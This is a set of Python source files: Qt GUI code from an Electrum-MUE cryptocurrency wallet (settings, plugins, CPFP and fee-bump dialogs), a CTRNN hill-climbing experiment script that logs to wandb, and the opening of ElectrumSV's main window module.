use_rbf_cb = QCheckBox(_('Use Replace-By-Fee'))
use_rbf_cb.setChecked(use_rbf)
use_rbf_cb.setToolTip(
_('If you check this box, your transactions will be marked as non-final,') + '\n' + \
_('and you will have the possibility, while they are unconfirmed, to replace them with transactions that pay higher fees.') + '\n' + \
_('Note that some merchants do not accept non-final transactions until they are confirmed.'))
def on_use_rbf(x):
self.config.set_key('use_rbf', bool(x))
batch_rbf_cb.setEnabled(bool(x))
use_rbf_cb.stateChanged.connect(on_use_rbf)
fee_widgets.append((use_rbf_cb, None))
batch_rbf_cb = QCheckBox(_('Batch RBF transactions'))
batch_rbf_cb.setChecked(self.config.get('batch_rbf', False))
batch_rbf_cb.setEnabled(use_rbf)
batch_rbf_cb.setToolTip(
_('If you check this box, your unconfirmed transactions will be consolidated into a single transaction.') + '\n' + \
_('This will save fees.'))
def on_batch_rbf(x):
self.config.set_key('batch_rbf', bool(x))
batch_rbf_cb.stateChanged.connect(on_batch_rbf)
fee_widgets.append((batch_rbf_cb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see https://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = base_units_list
msg = (_('Base unit of your wallet.')
+ '\n1 MUE = 1000 mMUE. 1 mMUE = 1000 uMUE. 1 uMUE = 100 sat.\n'
+ _('This setting affects the Send tab, and all balance related fields.'))
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
self.decimal_point = base_unit_name_to_decimal_point(unit_result)
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum_mue import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
colortheme_combo = QComboBox()
colortheme_combo.addItem(_('Light'), 'default')
colortheme_combo.addItem(_('Dark'), 'dark')
index = colortheme_combo.findData(self.config.get('qt_gui_color_theme', 'default'))
colortheme_combo.setCurrentIndex(index)
colortheme_label = QLabel(_('Color theme') + ':')
def on_colortheme(x):
self.config.set_key('qt_gui_color_theme', colortheme_combo.itemData(x), True)
self.need_restart = True
colortheme_combo.currentIndexChanged.connect(on_colortheme)
gui_widgets.append((colortheme_label, colortheme_combo))
updatecheck_cb = QCheckBox(_("Automatically check for software updates"))
updatecheck_cb.setChecked(self.config.get('check_updates', False))
def on_set_updatecheck(v):
self.config.set_key('check_updates', v == Qt.Checked, save=True)
updatecheck_cb.stateChanged.connect(on_set_updatecheck)
gui_widgets.append((updatecheck_cb, None))
filelogging_cb = QCheckBox(_("Write logs to file"))
filelogging_cb.setChecked(bool(self.config.get('log_to_file', False)))
def on_set_filelogging(v):
self.config.set_key('log_to_file', v == Qt.Checked, save=True)
filelogging_cb.stateChanged.connect(on_set_filelogging)
filelogging_cb.setToolTip(_('Debug logs can be persisted to disk. These are useful for troubleshooting.'))
gui_widgets.append((filelogging_cb, None))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transactions fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
if len(choosers) > 1:
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
def on_outrounding(x):
self.config.set_key('coin_chooser_output_rounding', bool(x))
enable_outrounding = self.config.get('coin_chooser_output_rounding', False)
outrounding_cb = QCheckBox(_('Enable output value rounding'))
outrounding_cb.setToolTip(
_('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' +
_('This might improve your privacy somewhat.') + '\n' +
_('If enabled, at most 100 satoshis might be lost due to this, per transaction.'))
outrounding_cb.setChecked(enable_outrounding)
outrounding_cb.stateChanged.connect(on_outrounding)
tx_widgets.append((outrounding_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
hist_capgains_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_history_capgains_cb():
if not self.fx: return
hist_capgains_checkbox.setChecked(self.fx.get_history_capital_gains_config())
hist_capgains_checkbox.setEnabled(hist_checkbox.isChecked())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.blockSignals(True)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
ex_combo.blockSignals(False)
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_model.refresh('on_history')
if self.fx.is_enabled() and checked:
self.fx.trigger_update()
update_history_capgains_cb()
def on_history_capgains(checked):
if not self.fx: return
self.fx.set_history_capital_gains_config(checked)
self.history_model.refresh('on_history_capgains')
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_history_capgains_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
hist_capgains_checkbox.stateChanged.connect(on_history_capgains)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show capital gains in history')), hist_capgains_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('General')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.trigger_update()
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.network.unregister_callback(self.on_quotes)
self.network.unregister_callback(self.on_history)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_fee = self.wallet.get_tx_fee(parent_tx)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
out_amt = max_fee - fee_e.get_amount()
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_e.get_amount()
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb):
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx):
fee = self.wallet.get_tx_fee(tx)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label(tx.txid())
tx_size = tx.estimated_size()
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
vbox.addWidget(QLabel(_('Current fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('New fee' + ':')))
fee_e = BTCAmountEdit(self.get_decimal_point)
fee_e.setAmount(fee * 1.5)
vbox.addWidget(fee_e)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * tx_size / 1000
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee = fee_e.get_amount()
delta = new_fee - fee
if delta < 0:
self.show_error("fee too low")
return
try:
new_tx = self.wallet.bump_fee(tx, delta)
except CannotBumpFee as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
def save_transaction_into_wallet(self, tx):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx.txid(), tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.storage.write()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
|
2021-08-10.py
|
from job.nwalker import NWalker
from multiprocessing import Process
from random import randint
from util.run import Run
import wandb
from job.nclimber import NClimber
from rl_ctrnn.ctrnn import Ctrnn
COLORS = {
1: "red",
2: "orange",
3: "yellow",
4: "lime",
6: "green",
8: "teal",
9: "cyan",
12: "blue",
18: "purple",
24: "magenta",
}
FITNESS = 0.5656714076031992
DURATION = 7200
PROGENITOR = {
"time_constants": {0: 1.0, 1: 1.0},
"biases": {0: 5.154455202973727, 1: -10.756384207938911},
"weights": {
0: {0: 5.352730101212875, 1: 16.0},
1: {0: -11.915400080418113, 1: 2.7717190607157542},
},
}
def fmt(samples: int) -> str:
zero = "0" if samples < 10 else ""
return zero + str(samples) + " sample" + ("" if samples == 1 else "s")
def part_a(samples: int = 1, seed: int = 0):
progenitor = Ctrnn.from_dict(PROGENITOR)
run: Run = wandb.init(
project="nclimber",
group="a2",
job_type=fmt(samples),
config={"samples": samples, "seed": seed},
)
c = NClimber(progenitor, seed=seed, duration=10, samples=samples)
c.setup()
a = 0
run.log({"Time": a, "fitness": c.attempts[c.best][1]})
while a < DURATION:
c.single_step()
a += int(c.duration * c.samples)
run.log({"Time": a, "fitness": c.attempts[c.best][1]})
run.finish()
def part_b(samples: int = 1, seed: int = 0):
progenitor = Ctrnn.from_dict(PROGENITOR)
run: Run = wandb.init(
project="nclimber",
group="b",
job_type=fmt(samples),
config={"samples": samples, "seed": seed},
)
c = NClimber(
progenitor, seed=seed, duration=10, samples=samples, mutation=0.05 * samples
)
c.setup()
a = 0
run.log({"Time": a, "fitness": c.attempts[c.best][1]})
while a < DURATION:
c.single_step()
a += int(c.duration * c.samples)
run.log({"Time": a, "fitness": c.attempts[c.best][1]})
run.finish()
def part_c(mutation: float = 0.05, seed: int = 0):
progenitor = Ctrnn.from_dict(PROGENITOR)
run: Run = wandb.init(
project="nclimber",
group="c",
job_type=fmt(8),
config={"samples": 8, "seed": seed, "mutation": mutation},
)
c = NClimber(
progenitor, seed=seed, duration=10, samples=8, mutation=mutation
)
c.setup()
a = 0
run.log({"Time": a, "fitness": c.attempts[c.best][1]})
while a < DURATION:
c.single_step()
a += int(c.duration * c.samples)
run.log({"Time": a, "fitness": c.attempts[c.best][1]})
run.finish()
def part_f(mutation: float = 0.05, seed: int = 0):
progenitor = Ctrnn.from_dict(PROGENITOR)
run: Run = wandb.init(
project="nclimber",
group="f2",
job_type=fmt(8),
config={"samples": 1, "seed": seed, "mutation": mutation},
)
c = NClimber(
progenitor, seed=seed, duration=10, samples=1, mutation=mutation
)
c.setup()
a = 0
run.log({"Time": a, "fitness": c.attempts[c.best][1]})
while a < DURATION:
c.single_step()
a += int(c.duration * c.samples)
data = {"Time": a, "fitness": c.attempts[c.best][1]}
ctrnn = c.attempts[c.best][0]
for y in range(ctrnn.size):
for x in range(ctrnn.size):
data[f"weight.{x}.{y}"] = ctrnn.weights[x, y]
run.log(data)
run.finish()
def part_g(mutation: float = 0.05, seed: int = 0):
progenitor = Ctrnn.from_dict(PROGENITOR)
run: Run = wandb.init(
project="nclimber",
group="g",
job_type=fmt(8),
config={"samples": 1, "seed": seed, "mutation": mutation},
)
c = NWalker(
progenitor, seed=seed, duration=10, samples=1, mutation=mutation
)
c.setup()
a = 0
run.log({"Time": a, "fitness": c.attempts[c.best][1]})
while a < DURATION:
c.single_step()
a += int(c.duration * c.samples)
data = {"Time": a, "fitness": c.attempts[c.best][1]}
ctrnn = c.attempts[c.best][0]
for y in range(ctrnn.size):
for x in range(ctrnn.size):
data[f"weight.{x}.{y}"] = ctrnn.weights[x, y]
run.log(data)
run.finish()
if __name__ == "__main__":
loops = 10.0
for n in range(int(loops)):
print(n / loops)
threads = []
seed = randint(11, 50000)
for i in [0.05, 0.1, 0.5, 1, 2, 3, 4, 5]:
threads.append(Process(target=part_a, args=(i, seed)))
for _, p in enumerate(threads):
p.start()
for _, p in enumerate(threads):
p.join()
|
main_window.py
|
# ElectrumSV - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
# Copyright (C) 2019 ElectrumSV developers
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import base64
from collections import Counter
import csv
from decimal import Decimal
from functools import partial
import json
import os
import shutil
import threading
import time
from typing import Iterable, Tuple
import weakref
import webbrowser
from bitcoinx import PublicKey, Script, Address, P2PKH_Address, TxOutput
from bitcoinx import OP_RETURN # pylint: disable=no-name-in-module
from PyQt5.QtCore import (pyqtSignal, Qt, QSize, QStringListModel, QTimer, QUrl)
from PyQt5.QtGui import QKeySequence, QCursor, QDesktopServices
from PyQt5.QtWidgets import (
QPushButton, QMainWindow, QTabWidget, QSizePolicy, QShortcut, QFileDialog, QMenuBar,
QMessageBox, QGridLayout, QLineEdit, QLabel, QComboBox, QHBoxLayout,
QVBoxLayout, QWidget, QCompleter, QMenu, QTreeWidgetItem, QTextEdit,
QInputDialog, QDialog, QToolBar, QAction, QPlainTextEdit, QTreeView
)
import electrumsv
from electrumsv import bitcoin, commands, keystore, paymentrequest, qrscanner, util
from electrumsv.app_state import app_state
from electrumsv.bitcoin import COIN, is_address_valid
from electrumsv.exceptions import NotEnoughFunds, UserCancelled, ExcessiveFee
from electrumsv.i18n import _
from electrumsv.keystore import Hardware_KeyStore
from electrumsv.logs import logs
from electrumsv.network import broadcast_failure_reason
from electrumsv.networks import Net
from electrumsv.paymentrequest import PR_PAID
from electrumsv.transaction import (
Transaction, tx_from_str, tx_output_to_display_text,
)
from electrumsv.util import (
format_time, format_satoshis, format_satoshis_plain, bh2u, format_fee_satoshis,
get_update_check_dates, get_identified_release_signers, profiler
)
from electrumsv.version import PACKAGE_VERSION
from electrumsv.wallet import Multisig_Wallet, sweep_preparations
import electrumsv.web as web
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit
from .contact_list import ContactList, edit_contact_dialog
from .coinsplitting_tab import CoinSplittingTab
from . import dialogs
from .preferences import PreferencesDialog
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import TxDialog
from .util import (
MessageBoxMixin, ColorScheme, HelpLabel, expiration_values, ButtonsLineEdit,
WindowModalDialog, Buttons, CopyCloseButton, MyTreeWidget, EnterButton,
WaitingDialog, ChoicesLayout, OkButton, WWLabel, read_QIcon,
CloseButton, CancelButton, text_dialog, filename_field, address_combo,
update_fixed_tree_height, UntrustedMessageDialog
)
from .wallet_api import WalletAPI
logger = logs.get_logger("mainwindow")
class ElectrumWindow(QMainWindow, MessageBoxMixin):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
notify_transactions_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
history_updated_signal = pyqtSignal()
network_status_signal = pyqtSignal(object)
def __init__(self, wallet):
QMainWindow.__init__(self)
self._api = WalletAPI(self)
self.logger = logger
self.config = app_state.config
self.wallet = wallet
self.network = app_state.daemon.network
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.app = app_state.app
self.cleaned_up = False
self.is_max = False
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.require_fee_update = False
self.tx_notifications = []
self.tx_notify_timer = None
self.tx_dialogs = []
self.tl_windows = []
self.tx_external_keypairs = {}
self.create_status_bar()
self.need_update = threading.Event()
self.fee_unit = self.config.get('fee_unit', 0)
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
self.coinsplitting_tab = self.create_coinsplitting_tab()
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name, default=False):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), default):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"),
_("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"),
_("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"),
_("Con&tacts"), "contacts")
